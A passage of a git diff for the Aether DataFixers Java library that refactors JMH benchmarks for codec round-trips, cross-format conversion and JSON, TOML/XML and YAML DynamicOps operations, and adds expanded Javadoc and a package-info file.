- final DataResult> decoded = encoded.flatMap(
- json -> Codecs.INT.decode(GsonOps.INSTANCE, json));
+ public void roundTripIntDirect(final Blackhole blackhole) {
+ final JsonElement json = Codecs.INT.encodeStart(this.ops, TEST_INT).result().orElseThrow();
+ final Pair decoded = Codecs.INT.decode(this.ops, json).result().orElseThrow();
blackhole.consume(decoded);
}
+ /**
+ * Benchmarks complete string round-trip (encode then decode).
+ *
+ *
Measures the combined performance of encoding a Java {@code String} to JSON
+ * and immediately decoding it back. String round-trips may involve additional
+ * overhead from string object creation compared to primitive numeric types.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
- public void roundTripString(final Blackhole blackhole) {
- final DataResult encoded = Codecs.STRING.encodeStart(GsonOps.INSTANCE, TEST_STRING);
- final DataResult> decoded = encoded.flatMap(
- json -> Codecs.STRING.decode(GsonOps.INSTANCE, json));
+ public void roundTripStringDirect(final Blackhole blackhole) {
+ final JsonElement json = Codecs.STRING.encodeStart(this.ops, TEST_STRING).result().orElseThrow();
+ final Pair decoded = Codecs.STRING.decode(this.ops, json).result().orElseThrow();
blackhole.consume(decoded);
}
}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/package-info.java
new file mode 100644
index 0000000..5720cfc
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/package-info.java
@@ -0,0 +1,163 @@
+/*
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+/**
+ * Codec-focused JMH benchmarks for the Aether DataFixers framework.
+ *
+ *
This package contains benchmarks that measure the performance of codec operations,
+ * including encoding (Java objects to serialized format) and decoding (serialized format
+ * to Java objects). These benchmarks establish baseline performance for the codec system
+ * and help identify bottlenecks in serialization pipelines.
Scaling with collection size, functional vs direct API overhead
+ *
+ *
+ *
+ *
Why Codec Benchmarks?
+ *
Codecs are fundamental to the DataFixer system, transforming data between typed
+ * Java objects and format-agnostic {@link de.splatgames.aether.datafixers.api.dynamic.Dynamic}
+ * representations. Understanding codec performance is essential for:
+ *
+ *
Baseline establishment: Primitive codecs set the lower bound for all
+ * codec operations; complex codecs compose these primitives
+ *
Bottleneck identification: Comparing encode vs decode reveals which
+ * direction is more expensive for a given type
+ *
Scaling analysis: Collection benchmarks show how performance changes
+ * with data volume
+ *
API comparison: Direct extraction vs functional composition may have
+ * different performance characteristics
{@link de.splatgames.aether.datafixers.benchmarks.concurrent concurrent} -
+ * Codec thread-safety is assumed; concurrent benchmarks validate this assumption
+ *
+ *
+ *
Supported Serialization Formats
+ *
These benchmarks use {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps}
+ * as the reference DynamicOps implementation. The codec system supports multiple formats:
+ *
+ *
JSON: GsonOps, JacksonJsonOps
+ *
YAML: SnakeYamlOps, JacksonYamlOps
+ *
TOML: JacksonTomlOps
+ *
XML: JacksonXmlOps
+ *
+ *
Future benchmarks may compare performance across different DynamicOps implementations.
+ *
+ * @see de.splatgames.aether.datafixers.benchmarks.codec.PrimitiveCodecBenchmark
+ * @see de.splatgames.aether.datafixers.benchmarks.codec.CollectionCodecBenchmark
+ * @see de.splatgames.aether.datafixers.api.codec.Codec
+ * @see de.splatgames.aether.datafixers.api.codec.Codecs
+ * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps
+ * @since 1.0.0
+ */
+package de.splatgames.aether.datafixers.benchmarks.codec;
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
index e60fd60..c74d288 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
@@ -114,7 +114,8 @@ public class SingleFixBenchmark {
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void singleRenameFix(final SizedState s, final Blackhole blackhole) {
+ public void singleRenameFix(final SizedState s,
+ final Blackhole blackhole) {
blackhole.consume(s.fixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
s.input,
@@ -133,7 +134,8 @@ public void singleRenameFix(final SizedState s, final Blackhole blackhole) {
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void identityFix(final SizedState s, final Blackhole blackhole) {
+ public void identityFix(final SizedState s,
+ final Blackhole blackhole) {
blackhole.consume(s.identityFixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
s.input,
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
index 0cd6961..ac0bce9 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
@@ -24,8 +24,6 @@
import com.fasterxml.jackson.databind.JsonNode;
import com.google.gson.JsonElement;
-import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
-import de.splatgames.aether.datafixers.api.dynamic.DynamicOps;
import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator;
import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize;
import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
@@ -49,12 +47,124 @@
import java.util.concurrent.TimeUnit;
/**
- * JMH benchmark for cross-format conversion performance.
+ * JMH benchmark for cross-format conversion performance between DynamicOps implementations.
*
- *
Measures the overhead of converting data between different
- * DynamicOps implementations using {@link DynamicOps#convertTo}.
+ *
This benchmark measures the overhead of converting data between different
+ * serialization formats using the {@code DynamicOps.convertTo()} mechanism. Cross-format
+ * conversion is essential when integrating systems that use different data formats
+ * or when migrating data through format-agnostic DataFixers.
+ *
+ *
Conversion Pairs Benchmarked
+ *
+ *
JSON Library Conversions
+ *
+ *
{@link #gsonToJackson} - Gson JsonElement → Jackson JsonNode
+ *
{@link #jacksonToGson} - Jackson JsonNode → Gson JsonElement
Measures the overhead of converting between two JSON libraries.
+ * Both represent JSON but use different internal tree structures.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void gsonToJackson(final Blackhole blackhole) {
- final JsonNode result = JacksonJsonOps.INSTANCE.convertTo(
- GsonOps.INSTANCE, this.gsonData.value());
+ final JsonNode result = this.jacksonJsonOps.convertTo(this.gsonOps, this.gsonRoot);
blackhole.consume(result);
}
/**
- * Benchmarks converting from Jackson JSON to Gson.
+ * Benchmarks conversion from Jackson JsonNode to Gson JsonElement.
+ *
+ *
Measures the reverse conversion from Jackson to Gson representation.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonToGson(final Blackhole blackhole) {
- final JsonElement result = GsonOps.INSTANCE.convertTo(
- JacksonJsonOps.INSTANCE, this.jacksonData.value());
+ final JsonElement result = this.gsonOps.convertTo(this.jacksonJsonOps, this.jacksonJsonRoot);
blackhole.consume(result);
}
- // ==================== Gson <-> SnakeYAML ====================
+ // ==================== Gson <-> SnakeYAML Conversions ====================
/**
- * Benchmarks converting from Gson to SnakeYAML.
+ * Benchmarks conversion from Gson JsonElement to SnakeYAML native types.
+ *
+ *
Measures cross-ecosystem conversion from JSON library to YAML library.
+ * SnakeYAML uses native Java Maps and Lists internally.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void gsonToSnakeYaml(final Blackhole blackhole) {
- final Object result = SnakeYamlOps.INSTANCE.convertTo(
- GsonOps.INSTANCE, this.gsonData.value());
+ final Object result = this.snakeYamlOps.convertTo(this.gsonOps, this.gsonRoot);
blackhole.consume(result);
}
/**
- * Benchmarks converting from SnakeYAML to Gson.
+ * Benchmarks conversion from SnakeYAML native types to Gson JsonElement.
+ *
+ *
Measures cross-ecosystem conversion from YAML native types to JSON tree.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void snakeYamlToGson(final Blackhole blackhole) {
- final JsonElement result = GsonOps.INSTANCE.convertTo(
- SnakeYamlOps.INSTANCE, this.snakeYamlData.value());
+ final JsonElement result = this.gsonOps.convertTo(this.snakeYamlOps, this.snakeYamlRoot);
blackhole.consume(result);
}
- // ==================== Jackson JSON <-> Jackson YAML ====================
+ // ==================== Jackson JSON <-> Jackson YAML Conversions ====================
/**
- * Benchmarks converting from Jackson JSON to Jackson YAML.
+ * Benchmarks conversion from Jackson JSON to Jackson YAML.
+ *
+ *
Measures conversion within the Jackson ecosystem. Both formats use
+ * JsonNode internally, potentially enabling optimizations.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonJsonToYaml(final Blackhole blackhole) {
- final JsonNode result = JacksonYamlOps.INSTANCE.convertTo(
- JacksonJsonOps.INSTANCE, this.jacksonData.value());
+ final JsonNode result = this.jacksonYamlOps.convertTo(this.jacksonJsonOps, this.jacksonJsonRoot);
blackhole.consume(result);
}
/**
- * Benchmarks converting from Jackson YAML to Jackson JSON.
+ * Benchmarks conversion from Jackson YAML to Jackson JSON.
+ *
+ *
Measures reverse conversion within the Jackson ecosystem.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonYamlToJson(final Blackhole blackhole) {
- final JsonNode result = JacksonJsonOps.INSTANCE.convertTo(
- JacksonYamlOps.INSTANCE, this.jacksonYamlData.value());
+ final JsonNode result = this.jacksonJsonOps.convertTo(this.jacksonYamlOps, this.jacksonYamlRoot);
blackhole.consume(result);
}
- // ==================== SnakeYAML <-> Jackson YAML ====================
+ // ==================== SnakeYAML <-> Jackson YAML Conversions ====================
/**
- * Benchmarks converting from SnakeYAML to Jackson YAML.
+ * Benchmarks conversion from SnakeYAML native types to Jackson YAML JsonNode.
+ *
+ *
Measures conversion between two YAML libraries with different internal
+ * representations (native Java types vs JsonNode).
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void snakeYamlToJacksonYaml(final Blackhole blackhole) {
- final JsonNode result = JacksonYamlOps.INSTANCE.convertTo(
- SnakeYamlOps.INSTANCE, this.snakeYamlData.value());
+ final JsonNode result = this.jacksonYamlOps.convertTo(this.snakeYamlOps, this.snakeYamlRoot);
blackhole.consume(result);
}
/**
- * Benchmarks converting from Jackson YAML to SnakeYAML.
+ * Benchmarks conversion from Jackson YAML JsonNode to SnakeYAML native types.
+ *
+ *
Measures reverse conversion from JsonNode to native Java Maps/Lists.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonYamlToSnakeYaml(final Blackhole blackhole) {
- final Object result = SnakeYamlOps.INSTANCE.convertTo(
- JacksonYamlOps.INSTANCE, this.jacksonYamlData.value());
+ final Object result = this.snakeYamlOps.convertTo(this.jacksonYamlOps, this.jacksonYamlRoot);
blackhole.consume(result);
}
}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
index 5dcccb6..d0f64b2 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
@@ -49,12 +49,98 @@
import java.util.concurrent.TimeUnit;
/**
- * JMH benchmark comparing Gson and Jackson JSON performance.
+ * JMH benchmark comparing JSON DynamicOps implementations: Gson vs Jackson.
*
- *
Measures DynamicOps operations and migration performance for both
- * JSON implementations.
+ *
This benchmark measures the performance of JSON-based operations using two
+ * different underlying libraries: Google Gson ({@link GsonOps}) and Jackson Databind
+ * ({@link JacksonJsonOps}). The results help determine which implementation is more
+ * suitable for specific use cases.
+ *
+ *
Benchmark Categories
+ *
+ *
Data Generation
+ *
Measure Dynamic object construction performance:
+ *
+ *
{@link #gsonGenerate} - Create Dynamic using GsonOps
+ *
{@link #jacksonGenerate} - Create Dynamic using JacksonJsonOps
+ *
+ *
+ *
Field Access
+ *
Measure field read operations on existing data:
+ *
+ *
{@link #gsonFieldRead} - Read field from Gson-backed Dynamic
+ *
{@link #jacksonFieldRead} - Read field from Jackson-backed Dynamic
+ *
+ *
+ *
Field Modification
+ *
Measure field write/set operations:
+ *
+ *
{@link #gsonFieldSet} - Set field on Gson-backed Dynamic
+ *
{@link #jacksonFieldSet} - Set field on Jackson-backed Dynamic
+ *
+ *
+ *
Migration
+ *
Measure DataFixer migration performance:
+ *
+ *
{@link #gsonMigration} - Apply fix to Gson-backed data
+ *
{@link #jacksonMigration} - Apply fix to Jackson-backed data
{@code
+ * # Run all JSON benchmarks
+ * java -jar benchmarks.jar JsonBenchmark
+ *
+ * # Compare only field access performance
+ * java -jar benchmarks.jar "JsonBenchmark.*FieldRead"
+ *
+ * # Run Gson-only benchmarks
+ * java -jar benchmarks.jar "JsonBenchmark.gson.*"
+ *
+ * # Run with specific payload size
+ * java -jar benchmarks.jar JsonBenchmark -p payloadSize=LARGE
+ * }
*
* @author Erik Pförtner
+ * @see YamlBenchmark
+ * @see TomlXmlBenchmark
+ * @see CrossFormatBenchmark
+ * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps
+ * @see de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps
* @since 1.0.0
*/
@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
@@ -65,131 +151,258 @@
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
public class JsonBenchmark {
+ /**
+ * Field name used for read/write benchmarks.
+ *
+ *
References the first string field generated by {@link BenchmarkDataGenerator}.
+ */
+ private static final String FIELD_NAME = "stringField0";
+
+ /**
+ * Payload size parameter controlling test data complexity.
+ *
+ *
Injected by JMH to run benchmarks across different data sizes.
+ */
@Param({"SMALL", "MEDIUM", "LARGE"})
private PayloadSize payloadSize;
+ /**
+ * Google Gson DynamicOps implementation.
+ */
+ private GsonOps gsonOps;
+
+ /**
+ * Jackson Databind DynamicOps implementation.
+ */
+ private JacksonJsonOps jacksonOps;
+
+ /**
+ * Pre-generated test data using Gson.
+ */
private Dynamic gsonData;
+
+ /**
+ * Pre-generated test data using Jackson.
+ */
private Dynamic jacksonData;
- private DataFixer fixer;
+
+ /**
+ * DataFixer for Gson-based migrations.
+ */
+ private DataFixer gsonFixer;
+
+ /**
+ * Optional DataFixer for Jackson-based migrations.
+ *
+ *
May be {@code null} if no dedicated Jackson fixer is configured.
+ * In that case, cross-format migration behavior is measured instead.
+ */
+ private DataFixer jacksonFixer;
+
+ /**
+ * Source version for migrations (v1).
+ */
private DataVersion fromVersion;
+
+ /**
+ * Target version for migrations (v2).
+ */
private DataVersion toVersion;
+ /**
+ * Initializes DynamicOps instances, test data, and DataFixers.
+ *
+ *
Both Gson and Jackson data are pre-generated to isolate benchmark
+ * measurements from data creation overhead (except for generation benchmarks).
+ */
@Setup(Level.Trial)
public void setup() {
- this.gsonData = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, this.payloadSize);
- this.jacksonData = BenchmarkDataGenerator.generate(JacksonJsonOps.INSTANCE, this.payloadSize);
- this.fixer = BenchmarkBootstrap.createSingleFixFixer();
+ this.gsonOps = GsonOps.INSTANCE;
+ this.jacksonOps = JacksonJsonOps.INSTANCE;
+
+ this.gsonData = BenchmarkDataGenerator.generate(this.gsonOps, this.payloadSize);
+ this.jacksonData = BenchmarkDataGenerator.generate(this.jacksonOps, this.payloadSize);
+
+ this.gsonFixer = BenchmarkBootstrap.createSingleFixFixer();
+
+ // If you have a dedicated Jackson fixer, wire it here. Otherwise keep it null and measure cross-format explicitly.
+ // Example (if you add it later): this.jacksonFixer = BenchmarkBootstrap.createSingleFixFixerJackson();
+ this.jacksonFixer = null;
+
this.fromVersion = new DataVersion(1);
this.toVersion = new DataVersion(2);
}
- // ==================== Data Generation ====================
+ // ==================== Data Generation Benchmarks ====================
/**
- * Benchmarks Gson data generation.
+ * Benchmarks Dynamic object generation using GsonOps.
+ *
+ *
Measures the time to create a complete test data structure using
+ * Gson as the underlying JSON representation.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void gsonGenerate(final Blackhole blackhole) {
- final Dynamic data = BenchmarkDataGenerator.generate(
- GsonOps.INSTANCE, this.payloadSize);
+ final Dynamic data = BenchmarkDataGenerator.generate(this.gsonOps, this.payloadSize);
blackhole.consume(data);
}
/**
- * Benchmarks Jackson JSON data generation.
+ * Benchmarks Dynamic object generation using JacksonJsonOps.
+ *
+ *
Measures the time to create a complete test data structure using
+ * Jackson as the underlying JSON representation.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonGenerate(final Blackhole blackhole) {
- final Dynamic data = BenchmarkDataGenerator.generate(
- JacksonJsonOps.INSTANCE, this.payloadSize);
+ final Dynamic data = BenchmarkDataGenerator.generate(this.jacksonOps, this.payloadSize);
blackhole.consume(data);
}
- // ==================== Field Access ====================
+ // ==================== Field Access Benchmarks ====================
/**
- * Benchmarks Gson field read access.
+ * Benchmarks field read access on Gson-backed Dynamic.
+ *
+ *
Measures the time to retrieve a single field from a pre-existing
+ * Gson-based Dynamic object.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void gsonFieldRead(final Blackhole blackhole) {
- final Dynamic field = this.gsonData.get("stringField0");
+ final Dynamic field = this.gsonData.get(FIELD_NAME);
blackhole.consume(field);
}
/**
- * Benchmarks Jackson field read access.
+ * Benchmarks field read access on Jackson-backed Dynamic.
+ *
+ *
Measures the time to retrieve a single field from a pre-existing
+ * Jackson-based Dynamic object.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonFieldRead(final Blackhole blackhole) {
- final Dynamic field = this.jacksonData.get("stringField0");
+ final Dynamic field = this.jacksonData.get(FIELD_NAME);
blackhole.consume(field);
}
- // ==================== Field Modification ====================
+ // ==================== Field Modification Benchmarks ====================
/**
- * Benchmarks Gson field set operation.
+ * Benchmarks field set operation on Gson-backed Dynamic.
+ *
+ *
Measures the time to add a new field to a Gson-based Dynamic object.
+ * This operation typically creates a new Dynamic with the modified content.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void gsonFieldSet(final Blackhole blackhole) {
final Dynamic result = this.gsonData.set(
- "newField", this.gsonData.createString("newValue"));
+ "newField",
+ this.gsonData.createString("newValue")
+ );
blackhole.consume(result);
}
/**
- * Benchmarks Jackson field set operation.
+ * Benchmarks field set operation on Jackson-backed Dynamic.
+ *
+ *
Measures the time to add a new field to a Jackson-based Dynamic object.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonFieldSet(final Blackhole blackhole) {
final Dynamic result = this.jacksonData.set(
- "newField", this.jacksonData.createString("newValue"));
+ "newField",
+ this.jacksonData.createString("newValue")
+ );
blackhole.consume(result);
}
- // ==================== Migration ====================
+ // ==================== Migration Benchmarks ====================
/**
- * Benchmarks migration with Gson DynamicOps.
+ * Benchmarks DataFixer migration on Gson-backed data.
+ *
+ *
Measures the time to apply a single fix migration to Gson-based
+ * Dynamic data. This represents the typical migration scenario where
+ * both fixer and data use the same DynamicOps implementation.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void gsonMigration(final Blackhole blackhole) {
- final Dynamic result = this.fixer.update(
+ final Dynamic result = this.gsonFixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
this.gsonData,
this.fromVersion,
- this.toVersion);
+ this.toVersion
+ );
blackhole.consume(result);
}
/**
- * Benchmarks migration with Jackson DynamicOps.
+ * Benchmarks DataFixer migration on Jackson-backed data.
+ *
+ *
If a dedicated Jackson fixer is available, measures native Jackson
+ * migration. Otherwise, falls back to cross-format migration using the
+ * Gson-based fixer with Jackson input data.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonMigration(final Blackhole blackhole) {
- // Note: Jackson migration uses Jackson-based data
- // The fixer is Gson-based, so this tests cross-format behavior
- final Dynamic result = this.fixer.update(
+ if (this.jacksonFixer == null) {
+ // No dedicated Jackson fixer available -> this would not be a fair "Jackson migration" benchmark.
+ // Measure the cross-format behavior explicitly instead.
+ final Dynamic result = this.gsonFixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ this.jacksonData,
+ this.fromVersion,
+ this.toVersion
+ );
+ blackhole.consume(result);
+ return;
+ }
+
+ final Dynamic result = this.jacksonFixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ this.jacksonData,
+ this.fromVersion,
+ this.toVersion
+ );
+ blackhole.consume(result);
+ }
+
+ /**
+ * Benchmarks cross-format migration with Jackson input and Gson-based fixer.
+ *
+ *
Measures the performance overhead when the fixer's DynamicOps differs
+ * from the input data's DynamicOps. This scenario is common when migrating
+ * data from various sources through a centralized fixer.
+ *
+ *
Comparing this benchmark with {@link #gsonMigration} reveals the
+ * overhead of format conversion during migration.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void crossFormatMigrationJacksonInput(final Blackhole blackhole) {
+ final Dynamic result = this.gsonFixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
this.jacksonData,
this.fromVersion,
- this.toVersion);
+ this.toVersion
+ );
blackhole.consume(result);
}
}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
index f618554..2dc134c 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
@@ -48,12 +48,100 @@
import java.util.concurrent.TimeUnit;
/**
- * JMH benchmark for TOML and XML format performance.
+ * JMH benchmark for TOML and XML DynamicOps implementations via Jackson.
*
- *
Measures DynamicOps operations and migration performance for
- * Jackson TOML and XML implementations.
+ *
This benchmark measures the performance of TOML and XML format operations
+ * using Jackson-based implementations ({@link JacksonTomlOps} and {@link JacksonXmlOps}).
+ * Both formats share Jackson's unified API, enabling direct performance comparison.
+ *
+ *
Benchmark Categories
+ *
+ *
Data Generation
+ *
Measure Dynamic object construction performance:
+ *
+ *
{@link #tomlGenerate} - Create Dynamic using JacksonTomlOps
+ *
{@link #xmlGenerate} - Create Dynamic using JacksonXmlOps
+ *
+ *
+ *
Field Access
+ *
Measure field read operations on existing data:
+ *
+ *
{@link #tomlFieldRead} - Read field from TOML-backed Dynamic
+ *
{@link #xmlFieldRead} - Read field from XML-backed Dynamic
+ *
+ *
+ *
Field Modification
+ *
Measure field write/set operations:
+ *
+ *
{@link #tomlFieldSet} - Set field on TOML-backed Dynamic
+ *
{@link #xmlFieldSet} - Set field on XML-backed Dynamic
+ *
+ *
+ *
Migration
+ *
Measure DataFixer migration performance:
+ *
+ *
{@link #tomlMigration} - Apply fix to TOML-backed data
+ *
{@link #xmlMigration} - Apply fix to XML-backed data
+ *
+ *
+ *
Implementations
+ *
+ *
Implementation
Library
Node Type
Use Case
+ *
+ *
{@link JacksonTomlOps}
+ *
Jackson Dataformat TOML
+ *
{@code JsonNode}
+ *
Configuration files, Rust ecosystem integration
+ *
+ *
+ *
{@link JacksonXmlOps}
+ *
Jackson Dataformat XML
+ *
{@code JsonNode}
+ *
Legacy systems, SOAP/REST APIs, document formats
+ *
+ *
+ *
+ *
Parameters
+ *
+ *
Parameter
Values
Description
+ *
payloadSize
SMALL, MEDIUM
Test data complexity (LARGE excluded for performance)
+ *
+ *
+ *
Note: The LARGE payload size is excluded from this benchmark because
+ * TOML and XML serialization typically have higher overhead than JSON/YAML,
+ * making large payloads impractical for typical use cases.
Measures the time to create a complete test data structure using
+ * Jackson's TOML dataformat module.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void tomlGenerate(final Blackhole blackhole) {
- final Dynamic data = BenchmarkDataGenerator.generate(
- JacksonTomlOps.INSTANCE, this.payloadSize);
+ final Dynamic data = BenchmarkDataGenerator.generate(this.tomlOps, this.payloadSize);
blackhole.consume(data);
}
/**
- * Benchmarks XML data generation.
+ * Benchmarks Dynamic object generation using JacksonXmlOps.
+ *
+ *
Measures the time to create a complete test data structure using
+ * Jackson's XML dataformat module.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void xmlGenerate(final Blackhole blackhole) {
- final Dynamic data = BenchmarkDataGenerator.generate(
- JacksonXmlOps.INSTANCE, this.payloadSize);
+ final Dynamic data = BenchmarkDataGenerator.generate(this.xmlOps, this.payloadSize);
blackhole.consume(data);
}
- // ==================== Field Access ====================
+ // ==================== Field Access Benchmarks ====================
/**
- * Benchmarks TOML field read access.
+ * Benchmarks field read access on TOML-backed Dynamic.
+ *
+ *
Measures the time to retrieve a single field from a pre-existing
+ * TOML-based Dynamic object.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void tomlFieldRead(final Blackhole blackhole) {
- final Dynamic field = this.tomlData.get("stringField0");
+ final Dynamic field = this.tomlData.get(FIELD_NAME);
blackhole.consume(field);
}
/**
- * Benchmarks XML field read access.
+ * Benchmarks field read access on XML-backed Dynamic.
+ *
+ *
Measures the time to retrieve a single field from a pre-existing
+ * XML-based Dynamic object.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void xmlFieldRead(final Blackhole blackhole) {
- final Dynamic field = this.xmlData.get("stringField0");
+ final Dynamic field = this.xmlData.get(FIELD_NAME);
blackhole.consume(field);
}
- // ==================== Field Modification ====================
+ // ==================== Field Modification Benchmarks ====================
/**
- * Benchmarks TOML field set operation.
+ * Benchmarks field set operation on TOML-backed Dynamic.
+ *
+ *
Measures the time to add a new field to a TOML-based Dynamic object.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void tomlFieldSet(final Blackhole blackhole) {
final Dynamic result = this.tomlData.set(
- "newField", this.tomlData.createString("newValue"));
+ "newField",
+ this.tomlData.createString("newValue")
+ );
blackhole.consume(result);
}
/**
- * Benchmarks XML field set operation.
+ * Benchmarks field set operation on XML-backed Dynamic.
+ *
+ *
Measures the time to add a new field to an XML-based Dynamic object.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void xmlFieldSet(final Blackhole blackhole) {
final Dynamic result = this.xmlData.set(
- "newField", this.xmlData.createString("newValue"));
+ "newField",
+ this.xmlData.createString("newValue")
+ );
blackhole.consume(result);
}
- // ==================== Migration ====================
+ // ==================== Migration Benchmarks ====================
/**
- * Benchmarks migration with TOML DynamicOps.
+ * Benchmarks DataFixer migration on TOML-backed data.
+ *
+ *
Measures the time to apply a single fix migration to TOML-based
+ * Dynamic data.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@@ -171,12 +332,16 @@ public void tomlMigration(final Blackhole blackhole) {
BenchmarkBootstrap.BENCHMARK_TYPE,
this.tomlData,
this.fromVersion,
- this.toVersion);
+ this.toVersion
+ );
blackhole.consume(result);
}
/**
- * Benchmarks migration with XML DynamicOps.
+ * Benchmarks DataFixer migration on XML-backed data.
+ *
+ *
Measures the time to apply a single fix migration to XML-based
+ * Dynamic data.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@@ -186,7 +351,8 @@ public void xmlMigration(final Blackhole blackhole) {
BenchmarkBootstrap.BENCHMARK_TYPE,
this.xmlData,
this.fromVersion,
- this.toVersion);
+ this.toVersion
+ );
blackhole.consume(result);
}
}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
index c387455..c0f2862 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
@@ -48,12 +48,97 @@
import java.util.concurrent.TimeUnit;
/**
